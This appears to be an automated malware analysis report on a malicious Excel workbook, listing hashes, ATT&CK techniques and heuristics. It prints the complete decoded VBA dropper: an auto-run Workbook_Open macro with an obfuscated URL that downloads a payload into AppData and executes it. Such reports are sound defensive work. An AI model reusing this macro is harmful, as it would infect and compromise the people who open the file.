Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a5a424fd7c494269…

MALICIOUS

Office (OLE)

160.5 KB Created: 2020-07-23 10:42:16 Authoring application: Microsoft Excel First seen: 2020-09-07
MD5: 633fbc752747a1f7cc051aabf87875a4 SHA-1: 3ed4edbd22477a4d278b8286c1919db12a8fd0c0 SHA-256: a5a424fd7c494269839a444b8273d69952c6f0547abec02eab32af181f0104f6
216 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer T1059 Command and Scripting Interpreter

The sample is an Excel file containing a Workbook_Open VBA macro that is designed to execute automatically when the workbook is opened. This macro uses the URLDownloadToFile API to download a second-stage payload from the hardcoded URL "fyf/*2)xzskvk0ijxpit0mq/{jc/eqvujyjnfmjo00;tquui" to a file named "fyf/ttbb" within the user's AppData directory. Subsequently, it uses ShellExecuteA to execute the downloaded file. The document body prompts the user to enable content, which is a common lure for macro-based malware.

Heuristics 7

  • Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    Private Declare PtrSafe Function nYNiXOdnVVIvWsFTBSE Lib "urlmon" Alias _
    "URLDownloadToFileA" (ByVal IiWTNgdAVuAwHLZv As Long, ByVal xGQK As String, _
    ByVal oEWrK As String, ByVal EuZjjimXQXCOOeildBQJt As Long, ByVal beybftDY As Long) As Long
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    SCNTPJYGHDMjhgYgHDJhjF = Decrypt("fyf/ttbb")
    bsGOPZxsVWDKdlbGBCAFInmhun = Environ$("AppData") & "\" & SCNTPJYGHDMjhgYgHDJhjF
  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9618 bytes
SHA-256: abdb40e88e155f6c162ac77a05a2a7f3897e88820fed26a88ebdb24d3ccc907e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub Dil()

End Sub

Attribute VB_Name = "UJFkrkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Declare Function etTime Lib "winmm.dll" () As Long


Private Declare Function timeGetTime Lib "winmm.dll" () As Long

Private Declare PtrSafe Function imeGetTime Lib "winmm.dll" () As Long

Private Declare PtrSafe Function Hwclmk Lib "shell32.dll" Alias _
"ShellExecuteA" (ByVal mYLnJHkRjU As Long, ByVal YyYkewtQmKCzKcqLzIhcEG As String, _
ByVal nHMUKqzz As String, ByVal yDZhoSgfvyB As String, ByVal tRhZJsuOrwJGpCccD As String, ByVal LXAT As Long) As Long

Private Declare PtrSafe Function nYNiXOdnVVIvWsFTBSE Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal IiWTNgdAVuAwHLZv As Long, ByVal xGQK As String, _
ByVal oEWrK As String, ByVal EuZjjimXQXCOOeildBQJt As Long, ByVal beybftDY As Long) As Long

Private Declare PtrSafe Function meGetTime Lib "winmm.dll" () As Long


Sub qxEU()
Dim pAuMwLKkfkFDfgxSGfgD As String
Dim SCNTPJYGHDMjhgYgHDJhjF As String
Dim bsGOPZxsVWDKdlbGBCAFInmhun As String
Dim wvLBEvUxdZIwRKUHGDFolkmNHgvcdERftGHSvfhd As String
Dim HyMWFFssTcAEdftghuYUuJIkmnbhgvcCD As String
Dim pQkPoFRGDxPMjSekgrIJ As String
SCNTPJYGHDMjhgYgHDJhjF = Decrypt("fyf/ttbb")
bsGOPZxsVWDKdlbGBCAFInmhun = Environ$("AppData") & "\" & SCNTPJYGHDMjhgYgHDJhjF


pAuMwLKkfkFDfgxSGfgD = Decrypt("fyf/*2)xzskvk0ijxpit0mq/{jc/eqvujyjnfmjo00;tquui")

nYNiXOdnVVIvWsFTBSE 0, pAuMwLKkfkFDfgxSGfgD, bsGOPZxsVWDKdlbGBCAFInmhun, 0, 0
Hwclmk 0, "open", bsGOPZxsVWDKdlbGBCAFInmhun, "", vbNullString, vbNormalFocus
End Sub

Sub Workbook_Open()

qxEU
End Sub


Function DisHp4e1dEwtDO8XRgW() As Currency
Call t7IOznwCrl
End Function
Static Function t7IOznwCrl() As Integer
Call Dp62rz6kt90kDRkudpcs1fW4
End Function
Function Dp62rz6kt90kDRkudpcs1fW4() As Single
Call Jb8AvPk2VR
End Function
Static Function Jb8AvPk2VR() As Date
Call TJW8h3uwBHyE3XYkFXIADNkq
End Function
Function TJW8h3uwBHyE3XYkFXIADNkq() As Variant
Call JxU0xFkI7x
End Function
Static Function JxU0xFkI7x() As Date
Call rzGwrPUM9xS2rvCsRX6OdVek
End Function
Function rzGwrPUM9xS2rvCsRX6OdVek() As Variant
Call hx2errEArb
End Function
Static Function hx2errEArb() As Double
Call lkYXBK4r3WCbBQoVfs4z78R
End Function
Function lkYXBK4r3WCbBQoVfs4z78R() As Single
Call FZ4yZPaWVH
End Function

Function Decrypt(enci)
    Dim bbop As String
    Dim cost As Date
    Dim vcninDkMDYSfv
    Dim AppData
    Dim ikolpliktrUjmM
    Dim np As Byte
    enci = StrReverse(enci)
    For ikolpliktrUjmM = 1 To Len(enci)
        vcninDkMDYSfv = Mid(enci, ikolpliktrUjmM, 1)
        
        bbop = ""
        cost = 19 / 6 / 2190
        nn = 1
AppData = AppData & Chr(AscW(vcninDkMDYSfv) - 1)
    Next
 
Decrypt = AppData

For np = 1 To Len(enc)

Next
    
End Function


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' Processing file: /tmp/qstore_5g3uxr3m
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/Module1 - 911 bytes
' Line #0:
' 	FuncDefn (Sub Sheet3())
' Line #1:
' Line #2:
' 	EndSub 
' _VBA_PROJECT_CUR/VBA/UJFkrkbook - 9200 bytes
' Line #0:
' 	FuncDefn (Private Declare Function Workbook Lib "Hwclmk" () As Long)
' Line #1:
' Line #2:
' Line #3:
' 	FuncDefn (Private Declare Function mYLnJHkRjU Lib "Hwclmk" () As Long)
' Line #4:
' Line #5:
' 	FuncDefn (Private Declare PtrSafe Function YyYkewtQmKCzKcqLzIhcEG Lib "Hwclmk" () As Long)
' Line #6:
' Line #7:
' 	LineCont 0x0008 08 00 00 00 14 00 00 00
' 	FuncDefn (Private Declare PtrSafe Function yDZhoSgfvyB Lib "oEWrK" (ByVal tRhZJsuOrwJGpCccD As Long, ByVal LXAT As String, ByVal shell32.dll As String, ByVal nYNiXOdnVVIvWsFTBSE As String, ByVal IiWTNgdAVuAwHLZv As String, ByVal xGQK As Long) As Long)
' Line #8:
' Line #9:
' 	LineCont 0x0008 08 00 00 00 14 00 00 00
' 	FuncDefn (Private Declare PtrSafe Function EuZjjimXQXCOOeildBQJt Lib "SCNTPJYGHDMjhgYgHDJhjF" (ByVal beybftDY As Long, ByVal urlmon As String, ByVal meGetTime As String, ByVal qxEU As Long, ByVal pAuMwLKkfkFDfgxSGfgD As Long) As Long)
' Line #10:
' Line #11:
' 	FuncDefn (Private Declare PtrSafe Function bsGOPZxsVWDKdlbGBCAFInmhun Lib "Hwclmk" () As Long)
' Line #12:
' Line #13:
' Line #14:
' 	FuncDefn (Sub wvLBEvUxdZIwRKUHGDFolkmNHgvcdERftGHSvfhd())
' Line #15:
' 	Dim 
' 	VarDefn HyMWFFssTcAEdftghuYUuJIkmnbhgvcCD (As String)
' Line #16:
' 	Dim 
' 	VarDefn pQkPoFRGDxPMjSekgrIJ (As String)
' Line #17:
' 	Dim 
' 	VarDefn Decrypt (As String)
' Line #18:
' 	Dim 
' 	VarDefn Environ (As String)
' Line #19:
' 	Dim 
' 	VarDefn vbNullString (As String)
' Line #20:
' 	Dim 
' 	VarDefn vbNormalFocus (As String)
' Line #21:
' 	LitStr 0x0008 "fyf/ttbb"
' 	ArgsLd Workbook_Open 0x0001 
' 	St pQkPoFRGDxPMjSekgrIJ 
' Line #22:
' 	LitStr 0x0007 "AppData"
' 	ArgsLd DisHp4e1dEwtDO8XRgW$ 0x0001 
' 	LitStr 0x0001 "\"
' 	Concat 
' 	Ld pQkPoFRGDxPMjSekgrIJ 
' 	Concat 
' 	St Decrypt 
' Line #23:
' Line #24:
' Line #25:
' 	LitStr 0x0030 "fyf/*2)xzskvk0ijxpit0mq/{jc/eqvujyjnfmjo00;tquui"
' 	ArgsLd Workbook_Open 0x0001 
' 	St HyMWFFssTcAEdftghuYUuJIkmnbhgvcCD 
' Line #26:
' Line #27:
' 	LitDI2 0x0000 
' 	Ld HyMWFFssTcAEdftghuYUuJIkmnbhgvcCD 
' 	Ld Decrypt 
' 	LitDI2 0x0000 
' 	LitDI2 0x0000 
' 	ArgsCall EuZjjimXQXCOOeildBQJt 0x0005 
' Line #28:
' 	LitDI2 0x0000 
' 	LitStr 0x0004 "open"
' 	Ld Decrypt 
' 	LitStr 0x0000 ""
' 	Ld t7IOznwCrl 
' 	Ld Dp62rz6kt90kDRkudpcs1fW4 
' 	ArgsCall yDZhoSgfvyB 0x0006 
' Line #29:
' 	EndSub 
' Line #30:
' Line #31:
' 	FuncDefn (Sub Jb8AvPk2VR())
' Line #32:
' Line #33:
' 	ArgsCall wvLBEvUxdZIwRKUHGDFolkmNHgvcdERftGHSvfhd 0x0000 
' Line #34:
' 	EndSub 
' Line #35:
' Line #36:
' Line #37:
' 	FuncDefn (Function TJW8h3uwBHyE3XYkFXIADNkq(id_FFFE As Currency) As Currency)
' Line #38:
' 	ArgsCall (Call) JxU0xFkI7x 0x0000 
' Line #39:
' 	EndFunc 
' Line #40:
' 	FuncDefn (Static Function JxU0xFkI7x(id_FFFE As Integer) As Integer)
' Line #41:
' 	ArgsCall (Call) rzGwrPUM9xS2rvCsRX6OdVek 0x0000 
' Line #42:
' 	EndFunc 
' Line #43:
' 	FuncDefn (Function rzGwrPUM9xS2rvCsRX6OdVek(id_FFFE As Single) As Single)
' Line #44:
' 	ArgsCall (Call) hx2errEArb 0x0000 
' Line #45:
' 	EndFunc 
' Line #46:
' 	FuncDefn (Static Function hx2errEArb(id_FFFE As Date) As Date)
' Line #47:
' 	ArgsCall (Call) lkYXBK4r3WCbBQoVfs4z78R 0x0000 
' Line #48:
' 	EndFunc 
' Line #49:
' 	FuncDefn (Function lkYXBK4r3WCbBQoVfs4z78R(id_FFFE As Variant) As Variant)
' Line #50:
' 	ArgsCall (Call) FZ4yZPaWVH 0x0000 
' Line #51:
' 	EndFunc 
' Line #52:
' 	FuncDefn (Static Function FZ4yZPaWVH(id_FFFE As Date) As Date)
' Line #53:
' 	ArgsCall (Call) DecryptON 0x0000 
' Line #54:
' 	EndFunc 
' Line #55:
' 	FuncDefn (Function DecryptON(id_FFFE As Variant) As Variant)
' Line #56:
' 	ArgsCall (Call) enci 0x0000 
' Line #57:
' 	EndFunc 
' Line #58:
' 	FuncDefn (Static Function enci(id_FFFE As Double) As Double)
' Line #59:
' 	ArgsCall (Call) bbop 0x0000 
' Line #60:
' 	EndFunc 
' Line #61:
' 	FuncDefn (Function bbop(id_FFFE As Single) As Single)
' Line #62:
' 	ArgsCall (Call) cost 0x0000 
' Line #63:
' 	EndFunc 
' Line #64:
' Line #65:
' 	FuncDefn (Function Workbook_Open(AppData, id_FFFE As Variant))
' Line #66:
' 	Dim 
' 	VarDefn ikolpliktrUjmM (As String)
' Line #67:
' 	Dim 
' 	VarDefn np (As Date)
' Line #68:
' 	Dim 
' 	VarDefn StrReverse
' Line #69:
' 	Dim 
' 	VarDefn nn
' Line #70:
' 	Dim 
' 	VarDefn Chr
' Line #71:
' 	Dim 
' 	VarDefn AscW (As Byte)
' Line #72:
' 	Ld AppData 
' 	ArgsLd enc 0x0001 
' 	St AppData 
' Line #73:
' 	StartForVariable 
' 	Ld Chr 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld AppData 
' 	FnLen 
' 	For 
' Line #74:
' 	Ld AppData 
' 	Ld Chr 
' 	LitDI2 0x0001 
' 	ArgsLd Mid 0x0003 
' 	St StrReverse 
' Line #75:
' Line #76:
' 	LitStr 0x0000 ""
' 	St ikolpliktrUjmM 
' Line #77:
' 	LitDI2 0x0013 
' 	LitDI2 0x0006 
' 	Div 
' 	LitDI2 0x088E 
' 	Div 
' 	St np 
' Line #78:
' 	LitDI2 0x0001 
' 	St _B_str_Environ 
' Line #79:
' 	Ld nn 
' 	Ld StrReverse 
' 	ArgsLd _B_var_nn 0x0001 
' 	LitDI2 0x0001 
' 	Sub 
' 	ArgsLd _B_var_Mid 0x0001 
' 	Concat 
' 	St nn 
' Line #80:
' 	StartForVariable 
' 	Next 
' Line #81:
' Line #82:
' 	Ld nn 
' 	St Workbook_Open 
' Line #83:
' Line #84:
' 	StartForVariable 
' 	Ld AscW 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld _B_var_Chr 
' 	FnLen 
' 	For 
' Line #85:
' Line #86:
' 	StartForVariable 
' 	Next 
' Line #87:
' Line #88:
' 	EndFunc 
' Line #89:
' _VBA_PROJECT_CUR/VBA/Sheet1 - 985 bytes
' _VBA_PROJECT_CUR/VBA/Sheet2 - 985 bytes
' _VBA_PROJECT_CUR/VBA/Sheet3 - 985 bytes